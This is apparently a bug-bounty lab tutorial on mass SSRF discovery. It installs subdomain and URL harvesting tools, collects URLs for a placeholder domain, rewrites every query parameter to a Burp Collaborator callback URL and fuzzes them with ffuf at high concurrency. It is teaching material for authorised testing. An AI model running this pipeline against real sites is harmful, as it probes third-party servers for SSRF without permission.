# Finding SSRF (all scope)

The goal of this laboratory is to use some tools to collect all subdomains from a specific domain, all the URLs and parameters, and retrieve some results using the burp collaborator utility.

## Tools

[**subfinder**](https://github.com/projectdiscovery/subfinder) - subdomain discovery.

How to install it:

```
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
```

&#x20;[**qsreplace**](https://github.com/tomnomnom/qsreplace) - Accept URLs on stdin, replace all query string values with a user-supplied value.

How to install it:

```
go get -u github.com/tomnomnom/qsreplace
```

&#x20;[**gau**](https://github.com/lc/gau)**:** Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

How to install it:

```
GO111MODULE=on go get -u -v github.com/lc/gau
```

&#x20;[**waybackurls**](https://github.com/tomnomnom/waybackurls)**:** Fetch all the URLs that the Wayback Machine knows about for a domain.

How to install it:

```
go get github.com/tomnomnom/waybackurls
```

&#x20;[**gf**](https://github.com/tomnomnom/gf)**:** A wrapper around grep, to help you grep for things.

How to install it:

```
go get -u github.com/tomnomnom/gf
```

List to exclude:

```
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
```

&#x20;[**ffuf**](https://github.com/ffuf/ffuf)**:** Fast web fuzzer written in Go.

How to install it:

```
go get -u github.com/ffuf/ffuf
```

## Scope

```
In Scope: *.example.com
```

## Harvester

```
gau -subs example.com; subfinder -d example.com -silent | waybackurls | sort -u > output.txt
```

## Replacing params

```
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
```

## Fuzzing and test

```
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
```

## Resources

To collect all URLs from several sources:

{% embed url="<https://github.com/signedsecurity/sigurlfind3r>" %}
